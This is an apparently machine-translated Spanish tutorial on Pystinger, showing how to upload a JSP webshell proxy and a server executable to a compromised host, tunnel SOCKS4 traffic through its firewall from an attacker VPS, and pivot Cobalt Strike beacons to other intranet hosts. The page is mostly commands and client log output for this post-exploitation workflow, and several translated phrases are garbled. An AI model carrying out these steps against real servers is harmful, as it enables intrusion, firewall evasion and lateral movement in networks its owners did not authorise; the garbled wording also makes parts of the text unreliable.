Tutoriales

Omita el firewall para enrutar el tráfico usando webshell

Pystinger equipo Proxy SOCK4 y La asignación de puertos a través de webshell. Puede ser utilizado directamente por Metasploit Framework, Viper y Cobalt Strike para sesiones en recorrido. Pystinger se desarrolló en Python y actualmente admite tres scripts de proxy: php, jsp (x) y aspx.

usar

Por ejemplo, suponga que el nombre de dominio del servidor es http://example.com: 8080 La dirección IP de la intranet de la intranet del servidor es 192.168.3.11

Proxy SOCK4

  • proxy.jsp Sube al servidor de destino y asegúrate de que http://example.com:8080/proxy.jsp pueda entrar a él. Se devuelve la página UTF-8
  • stinger_server.exe Sube al servidor de destino, AntSword ejecuta cmdstart D:/XXX/stinger_server.exeiniciar servidor derecho

No huyas D:/xxx/singer_server.exe directamente provocará la desconexión de TCP

  • Valer ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 en tu VPS
  • Verá la futuro salida

root @ kali: ~ # ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21: 12: 47,673 – INFO – 619 – Prueba de recital lugar …
2020-01-06 21: 12: 47,674 – INFO – 622 – Pase para escuchas locales
2020-01-06 21: 12: 47,674 – INFO – 623 – Socks4a en 127.0.0.1:60000
2020-01-06 21: 12: 47,674 – INFO – 628 – Revisión de WEBSHELL …
2020-01-06 21: 12: 47,681 – INFO – 631 – WEBSHELL Check Pass
2020-01-06 21: 12: 47,681 – INFO – 632 – http://example.com:8080/proxy.jsp
2020-01-06 21: 12: 47,682 – INFO – 637 – Controles REMOTE_SERVER …
2020-01-06 21: 12: 47,696 – INFO – 644 – paso de prueba REMOTE_SERVER
2020-01-06 21: 12: 47,696 – INFO – 645 – – Configuración del servidor –
2020-01-06 21: 12: 47,696 – INFO – 647 – client_address_list => []2020-01-06 21: 12: 47,696 – INFO – 647 – SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21: 12: 47,696 – INFO – 647 – LOG_LEVEL => INFO
2020-01-06 21: 12: 47,697 – INFO – 647 – MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21: 12: 47,697 – INFO – 647 – mirror_address_list => []2020-01-06 21: 12: 47,697 – INFO – 647 – READ_BUFF_SIZE => 51200
2020-01-06 21: 12: 47,697 – INFO – 673 – DIRECCIÓN_DESTINO: 127.0.0.1:60020
2020-01-06 21: 12: 47,697 – INFO – 677 – SLEEP_TIME: 0.01
2020-01-06 21: 12: 47,697 – INFO – 679 – – Configuración RAT –
2020-01-06 21: 12: 47,697 – INFO – 681 – Handler / LISTEN debe escuchar 127.0.0.1:60020
2020-01-06 21: 12: 47,697 – INFO – 683 – La carga útil debe conectarse a 127.0.0.1:60020
2020-01-06 21: 12: 47,698 – ADVERTENCIA – 111 – Inicio del hilo de onda
2020-01-06 21: 12: 47,703 – ADVERTENCIA – 502 – El servidor socks4a se iniciará en 127.0.0.1:60000
2020-01-06 21: 12: 47,703 – ADVERTENCIA – 509 – Socks4a sagaz para aceptar

  • Ahora has empezado uno socks4a proxy en VPS 127.0.0.1:60000 para la intranet de example.com.
  • Ahora el servidor de destino((example.com) 127.0.0.1:60020 fue asignado al VPS 127.0.0.1:60020

C.baliza de obaltstrike en recorrido para múltiples destinos

  • proxy.jsp Sube al servidor de destino y asegúrate de que http://example.com:8080/proxy.jsp pueda entrar a él. Se devuelve la página UTF-8
  • stinger_server.exe Sube al servidor de destino, AntSword ejecuta cmd start D:/XXX/stinger_server.exe 192.168.3.11para iniciar el servidor Pystinger (192.168.3.11 es la dirección IP de la intranet del objetivo)

192.168.3.11 puede cambiar a 0.0.0.0

  • Valer ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 en tu VPS
  • Verá la futuro salida

root @ kali: ~ # ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21: 12: 47,673 – INFO – 619 – Prueba de recital lugar …
2020-01-06 21: 12: 47,674 – INFO – 622 – Pase para escuchas locales
2020-01-06 21: 12: 47,674 – INFO – 623 – Socks4a en 127.0.0.1:60000
2020-01-06 21: 12: 47,674 – INFO – 628 – Revisión de WEBSHELL …
2020-01-06 21: 12: 47,681 – INFO – 631 – WEBSHELL Check Pass
2020-01-06 21: 12: 47,681 – INFO – 632 – http://example.com:8080/proxy.jsp
2020-01-06 21: 12: 47,682 – INFO – 637 – Controles REMOTE_SERVER …
2020-01-06 21: 12: 47,696 – INFO – 644 – paso de prueba REMOTE_SERVER
2020-01-06 21: 12: 47,696 – INFO – 645 – – Configuración del servidor –
2020-01-06 21: 12: 47,696 – INFO – 647 – client_address_list => []2020-01-06 21: 12: 47,696 – INFO – 647 – SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21: 12: 47,696 – INFO – 647 – LOG_LEVEL => INFO
2020-01-06 21: 12: 47,697 – INFO – 647 – MIRROR_LISTEN => 192.168.3.11:60020
2020-01-06 21: 12: 47,697 – INFO – 647 – mirror_address_list => []2020-01-06 21: 12: 47,697 – INFO – 647 – READ_BUFF_SIZE => 51200
2020-01-06 21: 12: 47,697 – INFO – 673 – DIRECCIÓN_DESTINO: 127.0.0.1:60020
2020-01-06 21: 12: 47,697 – INFO – 677 – SLEEP_TIME: 0.01
2020-01-06 21: 12: 47,697 – INFO – 679 – – Configuración RAT –
2020-01-06 21: 12: 47,697 – INFO – 681 – Handler / LISTEN debe escuchar 127.0.0.1:60020
2020-01-06 21: 12: 47,697 – INFO – 683 – La carga útil debe conectarse a 192.168.3.11:60020
2020-01-06 21: 12: 47,698 – ADVERTENCIA – 111 – Inicio del hilo de onda
2020-01-06 21: 12: 47,703 – ADVERTENCIA – 502 – El servidor socks4a se iniciará en 127.0.0.1:60000
2020-01-06 21: 12: 47,703 – ADVERTENCIA – 509 – Socks4a sagaz para aceptar

  • Agregue asistente en Cobaltstrike, el puerto del asistente es 60020 (Puerto Handler / LISTEN en RAT CONFIG de la salida), la dirección del asistente es 192.168.3.11
  • Genere datos de legatario, cárguelos en el destino y ejecútelos.
  • Moviéndose de flanco a otros hosts, puede apuntar la carga útil a 192.168.3.11:60020 para poner la baliza en recorrido

Encabezado y proxy personalizados

  • Si el webshell necesita configurar una cookie o una autorización, el encabezado de la solicitud se puede configurar usando el parámetro – header --header "Authorization: XXXXXX,Cookie: XXXXX"
  • Si es necesario entrar al webshell a través de un proxy, puede configurar el proxy a través del proxy --proxy "socks5:127.0.0.1:1081"

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba